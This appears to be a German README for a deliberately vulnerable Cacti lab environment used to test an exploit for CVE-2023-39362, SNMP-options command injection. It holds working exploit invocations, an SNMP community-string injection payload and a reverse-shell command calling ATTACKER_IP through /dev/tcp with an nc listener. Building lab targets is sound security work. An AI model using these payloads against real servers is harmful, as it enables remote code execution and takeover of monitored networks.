
Dieses Repository ist ein Fork dieses Repositories: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application
Cacti ist ein Open-Source-Framework für Betriebsüberwachung und Fehlermanagement, das sich kontinuierlich weiterentwickelt, um den dynamischen Anforderungen seiner Benutzergemeinschaft gerecht zu werden.
In Version 1.2.24 wurde eine potenzielle Sicherheitslücke identifiziert, die als CVE-2023-39362 geführt wird. Unter bestimmten Bedingungen kann ein authentifizierter privilegierter Benutzer eine Schwachstelle in den SNMP-Optionen eines Device ausnutzen, indem er eine bösartige Zeichenkette verwendet, die zu einer Befehlsinjektion führt. Diese Ausnutzung führt zur authentifizierten Ausführung von Remote-Code auf dem zugrunde liegenden Server.
CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362
Die Auswirkungen dieser Schwachstelle sind schwerwiegend, da ein Angreifer mit authentifizierten Privilegien die Integrität des Servers, auf dem Cacti gehostet wird, gefährden könnte. Diese Kompromittierung könnte möglicherweise als Einfallstor für unbefugten Zugriff auf andere Hosts im Netzwerk dienen, insbesondere auf die von Cacti überwachten.
Dies ist eine verwundbare Anwendung zum Testen des Exploits für die Cacti-Schwachstelle (CVE-2023-39362).
Diese Anwendung enthält schwerwiegende Sicherheitslücken. Nutzung auf eigene Gefahr! Es wird empfohlen, eine gesicherte und geschützte Umgebung zu verwenden (z. B. eine VM mit einem aktuellen Snapshot und Host-only-Netzwerk). Laden Sie diese Anwendung nicht auf Server hoch, die dem Internet ausgesetzt sind, da diese kompromittiert werden.
Ich übernehme keine Verantwortung für die Art und Weise, wie jemand diese Anwendung nutzt. Der einzige Zweck dieser Anwendung ist es, ein Testszenario für den CVE-2023-39362-Exploit zu sein, und sie sollte nicht böswillig verwendet werden. Wenn Ihr Server durch eine Installation dieser Anwendung kompromittiert wird, liegt das nicht in meiner Verantwortung, sondern in der Verantwortung der Person(en), die sie hochgeladen und installiert haben.**
Hier sind die Schritte zum Einrichten der Umgebung:
docker compose up -d aus, um die Komposition zu starten.admin/admin.admin an.guest.guest erneut an, um den Exploit zu testen.Die offizielle Installationsanleitung von Cacti finden Sie hier.
Zum Beenden der Umgebung verwenden Sie den Befehl docker compose down.
(Dies ist nur ein möglicher Weg zur Ausnutzung )
Führen Sie den Befehl auf dem Remote-Server aus:
python3 exploit.py --url http://localhost -u guest -p Sup3rS3cr3tPassword.1234 --cmd touch /tmp/proof
Öffnen einer Reverse Shell:
nc -lvnp 4242
python3 exploit.py --url http://localhost -u guest -p Sup3rS3cr3tPassword.1234 --cmd 'bash -c "exec bash -i &>/dev/tcp/ATTACKER_IP/PORT <&1"'
public\' ; touch /tmp/proof ; \'./tmp das Vorhandensein der erstellten Datei.Um eine Reverse Shell zu erhalten, kann ein Payload wie der folgende verwendet werden.
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'
Eine detaillierte Grundursache der Schwachstelle ist in der ursprünglichen Sicherheitsempfehlung oder im Blogbeitrag des ursprünglichen Autors verfügbar.
Dieses Projekt ist unter der Unlicense lizenziert - siehe die Datei LICENSE für Details.